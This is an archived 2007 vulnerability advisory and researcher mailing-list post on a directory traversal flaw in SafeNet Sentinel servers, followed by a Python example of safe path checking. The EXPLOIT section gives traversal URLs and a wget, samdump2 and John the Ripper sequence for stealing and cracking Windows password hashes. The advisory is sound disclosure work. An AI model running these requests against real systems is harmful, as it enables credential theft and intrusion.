
SafeNet Sentinel Products Let Remote Users Traverse the Directory

2007-11-28  Author: compiled by bitsCN

Impact:  Disclosure of system information, Disclosure of user information
Fix Available:  Yes   Exploit Included:  Yes   Vendor Confirmed:  Yes 
Version(s): Protection Server 7.0.0 through 7.4.0l; Keys Server 1.0.3; possibly prior versions
Description:  A vulnerability was reported in SafeNet's Sentinel Protection Server and Sentinel Keys Server products. A remote user can view files on the target system.

The software does not properly validate user-supplied input. A remote user can supply a specially crafted request to view arbitrary files on the target system.

Demonstration exploit URLs for the Protection Server and Keys Server, respectively, are provided:

http://[target]:6002/../../../../../../boot.ini
http://[target]:7002/../../../../../../boot.ini

Elliot Kendall of Brandeis University and Corey Lebleu of Digital Defense independently reported this vulnerability.
Impact:  A remote user can view files on the target system.
Solution:  The vendor has issued fixed versions (Protection Server 7.4.1, Keys Server 1.0.4).
Vendor URL:  www.safenet-inc.com/
Cause:  Input validation error
Underlying OS:  Windows (Any)
Reported By:  Elliot Kendall <ekendall@brandeis.edu>
Message History:   None.


 Source Message Contents
Date:  Mon, 26 Nov 2007 16:06:11 -0500
From:  Elliot Kendall <ekendall@brandeis.edu>
Subject:  Directory Traversal in SafeNet Sentinel Protection Server and Keys Server

SUMMARY
=======

SafeNet Inc.'s Sentinel Protection Server and Sentinel Keys Server
products include web servers which are vulnerable to directory
traversal attacks. A remote attacker could exploit these
vulnerabilities to read arbitrary files with the permissions of the web
server, typically SYSTEM.

AFFECTED SOFTWARE
=================

* Sentinel Protection Server 7.0.0 through 7.4.0 and possibly below
* Sentinel Keys Server 1.0.3 and possibly below

UNAFFECTED
==========

* Sentinel Protection Server 7.4.1
* Sentinel Keys Server 1.0.4

IMPACT
======

A remote attacker could exploit this vulnerability to read sensitive
files on the affected system. Attractive targets include the SAM
registry hive which contains system password hashes.

DETAILS
=======

Sentinel Protection Server and Sentinel Keys Server run web servers on
ports 6002 and 7002, respectively, to allow remote monitoring of key
use. The web server software does not sanitize request paths correctly
before using them in system calls. As a result, an attacker can request
files outside the web server's directory root by using the ../ notation
to refer to the parent directory of the current directory.

SOLUTION
========

Upgrade to Sentinel Protection Server 7.4.1 and Sentinel Keys Server
1.0.4.

First upgrade the Sentinel Driver software to 7.4.0 if you are using an
earlier version.

http://safenet-inc.com/support/files/Sentinel_Protection_Installer_7.4.0.zip

Then install "Security Patch to Sentinel Protection Installer 7.4.0"

http://safenet-inc.com/support/files/SPI740SecurityPatch.zip

EXPLOIT
=======

Most popular web browsers are not able to display URLs exploiting
this problem. I recommend using wget or lynx instead.

Substitute port 7002 to target Keys Server instead of Protection
Server.

This example will retrieve the C:\boot.ini file.

http://XX.XX.XX.XX:6002/../../../../../../boot.ini

This example will retrieve a copy of the target system's SAM registry
hive from the Windows repair folder:

http://XX.XX.XX.XX:6002/../../../../../../winnt/repair/sam

With the SAM and SYSTEM registry hives, it is possible to extract the
system's local password hashes for offline cracking. For example, using the
bkhive, samdump2, and John the Ripper tools:

$ wget -q http://XX.XX.XX.XX:6002/../../../../../../winnt/repair/sam
$ wget -q http://XX.XX.XX.XX:6002/../../../../../../winnt/repair/system
$ bkhive system keyfile
$ samdump2 sam keyfile > hashes
$ john --wordlist=all hashes

http://ophcrack.sourceforge.net/bkhive.php
http://www.openwall.com/john/

ACKNOWLEDGMENTS
===============

Thanks to SafeNet for patching this vulnerability and for working with
me on this advisory.

According to Digital Defense, Inc.'s advisory, Corey Lebleu originally
discovered this problem on October 10th, 2007. I discovered the same
vulnerability independently on October 29th, 2007. I have no reason to
doubt Digital Defense, Inc.'s claim, and do not claim to have
discovered the problem first.

REVISION HISTORY
================

2007-11-26  original release

-- 
Elliot Kendall <ekendall@brandeis.edu>
Network Security Architect
Brandeis University

Trouble replying? See http://people.brandeis.edu/~ekendall/sign/
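
The root cause given under DETAILS (request paths used in file system calls without being confined to the web server's directory root) is shown here as an added example; it is not part of the advisory and is not SafeNet's code. The names naive_resolve, safe_resolve, audit and SAMPLE_TARGETS are hypothetical, and the check goes slightly beyond the literal ../ case to cover percent-encoded and backslash forms.

```python
import os
from urllib.parse import unquote

def naive_resolve(root, target):
    # Hypothetical stand-in for the flawed pattern: the request path is joined
    # to the document root and normalised, but never checked against the root.
    return os.path.normpath(os.path.join(root, target.lstrip("/")))

def safe_resolve(root, target):
    """Return the absolute path to serve, or None if the request leaves root."""
    path = unquote(target.split("?", 1)[0])   # drop query, decode %2e%2e once
    if "\x00" in path:
        return None
    path = path.replace("\\", "/")            # Windows accepts both separators
    root_real = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root_real, path.lstrip("/")))
    try:
        # commonpath compares whole components, so a sibling such as
        # "<root>-old" is not mistaken for a location inside root.
        inside = os.path.commonpath([root_real, candidate]) == root_real
    except ValueError:                        # different drive on Windows
        return None
    return candidate if inside else None

# Constructed request targets (not captured traffic).
SAMPLE_TARGETS = [
    "/index.html",
    "/../../../../../../boot.ini",
    "/%2e%2e/%2e%2e/boot.ini",
    "/..\\..\\boot.ini",
]

def audit(root, targets=SAMPLE_TARGETS):
    """Map each target to True (served) or False (rejected)."""
    return {t: safe_resolve(root, t) is not None for t in targets}

if __name__ == "__main__":
    for target, served in audit(os.getcwd()).items():
        print("serve " if served else "reject", target)
```

The containment test runs after canonicalisation (realpath), so symbolic links and redundant separators are resolved before the comparison with the root.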
